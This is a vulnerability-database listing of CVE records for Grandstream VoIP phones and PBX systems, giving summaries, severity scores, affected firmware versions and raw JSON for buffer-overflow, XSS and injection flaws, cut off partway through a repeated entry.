Search
Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
63 vulnerabilities by Grandstream
CVE-2026-2329 (GCVE-0-2026-2329)
Vulnerability from nvd – Published: 2026-02-18 14:08 – Updated: 2026-02-18 14:50
VLAI
Title
Grandstream GXP1600 VoIP Phones - Unauthenticated stack buffer overflow
Summary
An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-121 - Stack-based Buffer Overflow
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://www.rapid7.com/blog/post/ve-cve-2026-2329… | third-party-advisory |
| https://psirt.grandstream.com/ | vendor-advisory |
| https://firmware.grandstream.com/Release_Note_GXP… | release-notes |
| https://github.com/rapid7/metasploit-framework/pu… | exploit |
Impacted products
6 products
| Vendor | Product | Version | |
|---|---|---|---|
| Grandstream | GXP1610 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1615 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1620 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1625 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1628 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1630 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
Date Public
2026-02-18 14:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-2329",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-18T14:50:26.406047Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-18T14:50:51.252Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "GXP1610",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1615",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1620",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1625",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1628",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1630",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Stephen Fewer, Senior Principal Security Researcher at Rapid7"
}
],
"datePublic": "2026-02-18T14:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.\u003cbr\u003e"
}
],
"value": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121 Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-18T14:08:09.272Z",
"orgId": "9974b330-7714-4307-a722-5648477acda7",
"shortName": "rapid7"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://psirt.grandstream.com/"
},
{
"tags": [
"release-notes"
],
"url": "https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/rapid7/metasploit-framework/pull/20983"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Grandstream GXP1600 VoIP Phones - Unauthenticated stack buffer overflow",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "9974b330-7714-4307-a722-5648477acda7",
"assignerShortName": "rapid7",
"cveId": "CVE-2026-2329",
"datePublished": "2026-02-18T14:08:09.272Z",
"dateReserved": "2026-02-11T09:26:52.179Z",
"dateUpdated": "2026-02-18T14:50:51.252Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-14186 (GCVE-0-2025-14186)
Vulnerability from nvd – Published: 2025-12-07 07:32 – Updated: 2025-12-08 17:12
VLAI
Title
Grandstream GXP1625 Network Status api.values.post cross site scripting
Summary
A security flaw has been discovered in Grandstream GXP1625 1.0.7.4. The impacted element is an unknown function of the file /cgi-bin/api.values.post of the component Network Status Page. Performing manipulation of the argument vpn_ip results in basic cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://vuldb.com/?id.334606 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.334606 | signaturepermissions-required |
| https://vuldb.com/?submit.698650 | third-party-advisory |
| https://drive.google.com/file/d/1rsskCaj4TwiaGG9_… | exploit |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Grandstream | GXP1625 |
Affected:
1.0.7.4
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-14186",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-08T17:03:17.876643Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-08T17:12:50.148Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"modules": [
"Network Status Page"
],
"product": "GXP1625",
"vendor": "Grandstream",
"versions": [
{
"status": "affected",
"version": "1.0.7.4"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "cccll (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A security flaw has been discovered in Grandstream GXP1625 1.0.7.4. The impacted element is an unknown function of the file /cgi-bin/api.values.post of the component Network Status Page. Performing manipulation of the argument vpn_ip results in basic cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 4,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:ND/RC:UR",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-80",
"description": "Basic Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-74",
"description": "Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-07T07:32:06.898Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-334606 | Grandstream GXP1625 Network Status api.values.post cross site scripting",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.334606"
},
{
"name": "VDB-334606 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.334606"
},
{
"name": "Submit #698650 | Grandstream GXP1625 1.0.7.4 xss",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.698650"
},
{
"tags": [
"exploit"
],
"url": "https://drive.google.com/file/d/1rsskCaj4TwiaGG9_VYabjnKMP_zAry7L/view?usp=sharing"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-12-06T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2025-12-06T01:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2025-12-06T15:06:24.000Z",
"value": "VulDB entry last update"
}
],
"title": "Grandstream GXP1625 Network Status api.values.post cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2025-14186",
"datePublished": "2025-12-07T07:32:06.898Z",
"dateReserved": "2025-12-06T14:01:21.254Z",
"dateUpdated": "2025-12-08T17:12:50.148Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-32937 (GCVE-0-2024-32937)
Vulnerability from nvd – Published: 2024-07-03 14:05 – Updated: 2025-11-04 17:20
VLAI
Summary
An os command injection vulnerability exists in the CWMP SelfDefinedTimeZone functionality of Grandstream GXP2135 1.0.9.129, 1.0.11.74 and 1.0.11.79. A specially crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.
Severity
8.1 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Grandstream | GXP2135 |
Affected:
1.0.11.74
Affected: 1.0.11.79 Affected: 1.0.9.129 |
|
| grandstream | gxp2135_firmware |
Affected:
1.0.11.74
Affected: 1.0.11.79 Affected: 1.0.9.129 cpe:2.3:o:grandstream:gxp2135_firmware:*:*:*:*:*:*:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:grandstream:gxp2135_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "gxp2135_firmware",
"vendor": "grandstream",
"versions": [
{
"status": "affected",
"version": "1.0.11.74"
},
{
"status": "affected",
"version": "1.0.11.79"
},
{
"status": "affected",
"version": "1.0.9.129"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-32937",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-03T14:16:57.228461Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-03T14:59:05.703Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:20.384Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978",
"tags": [
"x_transferred"
],
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978"
},
{
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1978"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "GXP2135",
"vendor": "Grandstream",
"versions": [
{
"status": "affected",
"version": "1.0.11.74"
},
{
"status": "affected",
"version": "1.0.11.79"
},
{
"status": "affected",
"version": "1.0.9.129"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Matthew Bernath of Cisco Talos."
}
],
"descriptions": [
{
"lang": "en",
"value": "An os command injection vulnerability exists in the CWMP SelfDefinedTimeZone functionality of Grandstream GXP2135 1.0.9.129, 1.0.11.74 and 1.0.11.79. A specially crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-03T17:00:11.294Z",
"orgId": "b86d76f8-0f8a-4a96-a78d-d8abfc7fc29b",
"shortName": "talos"
},
"references": [
{
"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "b86d76f8-0f8a-4a96-a78d-d8abfc7fc29b",
"assignerShortName": "talos",
"cveId": "CVE-2024-32937",
"datePublished": "2024-07-03T14:05:35.575Z",
"dateReserved": "2024-04-19T20:26:32.967Z",
"dateUpdated": "2025-11-04T17:20:20.384Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-0840 (GCVE-0-2024-0840)
Vulnerability from nvd – Published: 2024-04-29 18:42 – Updated: 2024-08-01 18:18
VLAI
Title
Grandstream UCM Series IP PBX HTTP Parameter Injection
Summary
The Grandstream UCM Series IP PBX before firmware version 1.0.20.52 is affected by a parameter injection vulnerability in the HTTP interface. A remote and authenticated attacker can execute arbitrary code by sending a crafted HTTP request. Authentication may be possible using a default user and password. Affected models are the UCM6202, UCM6204, UCM6208, and UCM6510.
Severity
8.8 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-141 - Improper Neutralization of Parameter/Argument Delimiters
Assigner
References
1 reference
Impacted products
5 products
| Vendor | Product | Version | |
|---|---|---|---|
| Grandstream | UCM Series |
Affected:
0 , < <1.0.20.52
(custom)
|
|
| grandstream | ucm6202_firmware |
Affected:
0 , < 1.0.20.52
(custom)
cpe:2.3:a:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:* |
|
| grandstream | ucm6204_firmware |
Affected:
0 , < 1.0.20.52
(custom)
cpe:2.3:a:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:* |
|
| grandstream | ucm6208_firmware |
Affected:
0 , < 1.0.20.52
(custom)
cpe:2.3:a:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:* |
|
| grandstream | ucm6510_firmware |
Affected:
0 , < 1.0.20.52
(custom)
cpe:2.3:a:grandstream:ucm6510_firmware:*:*:*:*:*:*:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ucm6202_firmware",
"vendor": "grandstream",
"versions": [
{
"lessThan": "1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ucm6204_firmware",
"vendor": "grandstream",
"versions": [
{
"lessThan": "1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ucm6208_firmware",
"vendor": "grandstream",
"versions": [
{
"lessThan": "1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:grandstream:ucm6510_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ucm6510_firmware",
"vendor": "grandstream",
"versions": [
{
"lessThan": "1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-0840",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-01T19:17:53.854809Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-06T13:09:24.386Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:18:18.719Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://vulncheck.com/advisories/grand-stream-param-injection"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "UCM Series",
"vendor": "Grandstream",
"versions": [
{
"lessThan": "\u003c1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Jacob Baines (VulnCheck)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "The Grandstream UCM Series IP PBX before firmware version 1.0.20.52 is affected by a parameter injection vulnerability in the HTTP interface. A remote and authenticated attacker can execute arbitrary code by sending a crafted HTTP request. Authentication may be possible using a default user and password. Affected models are the UCM6202, UCM6204, UCM6208, and UCM6510.\u003cbr\u003e"
}
],
"value": "The Grandstream UCM Series IP PBX before firmware version 1.0.20.52 is affected by a parameter injection vulnerability in the HTTP interface. A remote and authenticated attacker can execute arbitrary code by sending a crafted HTTP request. Authentication may be possible using a default user and password. Affected models are the UCM6202, UCM6204, UCM6208, and UCM6510.\n"
}
],
"impacts": [
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-141",
"description": "CWE-141 Improper Neutralization of Parameter/Argument Delimiters",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-04-29T18:42:57.112Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"url": "https://vulncheck.com/advisories/grand-stream-param-injection"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to firmware version 1.0.20.52 or later. Ensure the web interface is not exposed to the internet.\u003cbr\u003e"
}
],
"value": "Upgrade to firmware version 1.0.20.52 or later. Ensure the web interface is not exposed to the internet.\n"
}
],
"source": {
"discovery": "UNKNOWN"
},
"timeline": [
{
"lang": "en",
"time": "2024-01-25T17:00:00.000Z",
"value": "VulnCheck reports the vulnerability to Grandstream"
},
{
"lang": "en",
"time": "2024-01-26T02:00:00.000Z",
"value": "Grandstream acknowledges receipt"
},
{
"lang": "en",
"time": "2024-02-08T04:42:00.000Z",
"value": "Grandstream shares a patch build"
},
{
"lang": "en",
"time": "2024-04-26T04:11:00.000Z",
"value": "Grandstream releases 1.0.20.52"
}
],
"title": "Grandstream UCM Series IP PBX HTTP Parameter Injection",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2024-0840",
"datePublished": "2024-04-29T18:42:57.112Z",
"dateReserved": "2024-01-23T21:10:19.364Z",
"dateUpdated": "2024-08-01T18:18:18.719Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-2329 (GCVE-0-2026-2329)
Vulnerability from cvelistv5 – Published: 2026-02-18 14:08 – Updated: 2026-02-18 14:50
VLAI
Title
Grandstream GXP1600 VoIP Phones - Unauthenticated stack buffer overflow
Summary
An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-121 - Stack-based Buffer Overflow
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://www.rapid7.com/blog/post/ve-cve-2026-2329… | third-party-advisory |
| https://psirt.grandstream.com/ | vendor-advisory |
| https://firmware.grandstream.com/Release_Note_GXP… | release-notes |
| https://github.com/rapid7/metasploit-framework/pu… | exploit |
Impacted products
6 products
| Vendor | Product | Version | |
|---|---|---|---|
| Grandstream | GXP1610 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1615 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1620 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1625 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1628 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
|
| Grandstream | GXP1630 |
Affected:
0 , ≤ 1.0.7.80
(semver)
|
Date Public
2026-02-18 14:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-2329",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-18T14:50:26.406047Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-18T14:50:51.252Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "GXP1610",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1615",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1620",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1625",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1628",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "GXP1630",
"vendor": "Grandstream",
"versions": [
{
"lessThanOrEqual": "1.0.7.80",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Stephen Fewer, Senior Principal Security Researcher at Rapid7"
}
],
"datePublic": "2026-02-18T14:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.\u003cbr\u003e"
}
],
"value": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121 Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-18T14:08:09.272Z",
"orgId": "9974b330-7714-4307-a722-5648477acda7",
"shortName": "rapid7"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://psirt.grandstream.com/"
},
{
"tags": [
"release-notes"
],
"url": "https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/rapid7/metasploit-framework/pull/20983"
}
],
"source": {
"discovery": "UNKNOWN"
},
